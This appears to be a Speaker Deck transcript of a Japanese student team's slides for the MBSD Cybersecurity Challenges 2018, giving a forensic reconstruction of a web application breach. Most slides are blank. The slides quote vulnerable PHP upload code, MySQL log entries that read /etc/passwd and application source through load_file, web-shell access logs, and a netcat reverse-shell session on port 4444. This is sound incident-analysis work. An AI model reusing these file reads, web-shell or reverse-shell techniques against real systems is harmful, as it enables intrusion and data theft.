Upgrade to Pro — share decks privately, control downloads, hide ads and more …

MBSD Cybersecurity Challenges 2018 最終審査会 発表スライド

8ayac
December 12, 2018

MBSD Cybersecurity Challenges 2018 最終審査会 発表スライド

チームIPFactoryとして発表したもの

8ayac

December 12, 2018
Tweet

More Decks by 8ayac

Other Decks in Technology

Transcript

  1. MBSD Cybersecurity Challenges 2018

    View Slide

  2. View Slide

  3. View Slide







  4. View Slide














  5. View Slide







  6. View Slide










  7. View Slide

  8. View Slide

  9. View Slide

  10. sendmessage.php



    $prefix = md5(time() . $user->id);
    $tname = $prefix . basename($_FILES["file"]["name"]);
    if (move_uploaded_file($_FILES['file']['tmp_name'], "./tmp/".$tname) && preg_match("/^[^.]+¥.jpg$/",$tname)) {

    View Slide

  11. sendmessage.php (2018/9/21 14:46:48)
    180921 14:39:24 26247 Connect [email protected] on mysql
    180921 14:41:06 26247 Query select load_file('/etc/hosts')
    180921 14:41:12 26247 Query select load_file('/etc/passwd')
    180921 14:42:30 26247 Query select load_file('/etc/issue')
    180921 14:42:45 26247 Query select load_file('/etc/httpd/conf/httpd.conf')
    180921 14:43:32 26247 Query select load_file('/var/www/html/webmix3/index.php')
    180921 14:44:30 26247 Query select load_file('/var/www/html/webmix3/login.php')
    180921 14:44:54 26247 Query select load_file('/var/www/html/webmix3/libs.php')
    180921 14:45:25 26247 Query select load_file('/var/www/html/webmix3/class/class.php')
    180921 14:45:45 26247 Query select load_file('/var/www/html/webmix3/class/User.php')
    180921 14:46:48 26247 Query select load_file('/var/www/html/webmix3/sendmessage.php')

    View Slide

  12. Web Shell (2018/9/21 15:12:46)
    192.168.11.2
    >
    >

    View Slide

  13. Web Shell (2018/9/21 15:12:46)
    192.168.11.2
    >
    >
    7449f92ea0f26445e89ae968227efaabtest.php

    View Slide

  14. Web Shell (2018/9/21 15:12:46)
    192.168.11.2
    >
    >
    7449f92ea0f26445e89ae968227efaabtest.php
    [Fri Sep 21 15:14:01 2018] [error] [client 192.168.11.204] PHP Notice: Undefined index: cmd in
    /var/www/html/webmix3/tmp/7449f92ea0f26445e89ae968227efaabtest.php on line 1
    [Fri Sep 21 15:14:01 2018] [error] [client 192.168.11.204] PHP Warning: system(): Cannot execute a
    blank command in /var/www/html/webmix3/tmp/7449f92ea0f26445e89ae968227efaabtest.php on line 1

    View Slide

  15. Web Shell (2018/9/21 15:12:46)
    192.168.11.2
    >
    >
    7449f92ea0f26445e89ae968227efaabtest.php
    192.168.11.204 - - [21/Sep/2018:15:14:01 +0900] "GET /tmp/7449f92ea0f26445e89ae968227efaabtest.php
    HTTP/1.1" 200 58 "-" "Mozilla/5.0 (X11; Linux 86_64; rv:52.0) Gecko/20100101 Firefox/52.0"

    View Slide

  16. Web Shell (2018/9/21 15:12:46)
    192.168.11.2
    >
    >
    7449f92ea0f26445e89ae968227efaabtest.php
    192.168.11.204 - - [21/Sep/2018:15:14:01 +0900] "GET /tmp/7449f92ea0f26445e89ae968227efaabtest.php
    HTTP/1.1" 200 58 "-" "Mozilla/5.0 (X11; Linux 86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
    192.168.11.204 - - [21/Sep/2018:15:12:46 +0900] "POST /sendmessage.php HTTP/1.1" 200 1783
    "http://192.168.11.2/sendmessage.php" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101
    Firefox/52.0"

    View Slide

  17. (2018/9/21 15:29:02)
    $ nc –lvp 4444
    192.168.11.2
    >

    View Slide

  18. (2018/9/21 15:29:02)
    192.168.11.2
    >
    4444/TCPで待受中…

    View Slide

  19. (2018/9/21 15:29:02)
    192.168.11.2
    >
    4444/TCPで待受中…

    View Slide

  20. (2018/9/21 15:29:02)
    192.168.11.2
    >
    $ nc -lvp 4444
    Listening on [0.0.0.0] (family 0, port 4444)
    Connection from 192.168.11.204 64495 received!
    sh-4.1$

    View Slide

  21. (2018/9/21 15:29:02)
    192.168.11.2
    >
    $ nc -lvp 4444
    Listening on [0.0.0.0] (family 0, port 4444)
    Connection from 192.168.11.204 64495 received!
    sh-4.1$
    192.168.11.204 - - [21/Sep/2018:15:29:02 +0900] "POST /tmp/7449f92ea0f26445e89ae968227efaabtest.php
    HTTP/1.1" 200 58 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
    192.168.11.204 - - [21/Sep/2018:15:14:01 +0900] "GET /tmp/7449f92ea0f26445e89ae968227efaabtest.php
    HTTP/1.1" 200 58 "-" "Mozilla/5.0 (X11; Linux 86_64; rv:52.0) Gecko/20100101 Firefox/52.0"

    View Slide

  22. View Slide




  23. View Slide




  24. POST

    View Slide




  25. POST
    POST

    View Slide

  26. ( )



    View Slide

  27. POST



    View Slide

  28. View Slide

  29. 38

    View Slide








  30. View Slide








  31. View Slide







  32. View Slide



  33. View Slide





  34. View Slide

  35. View Slide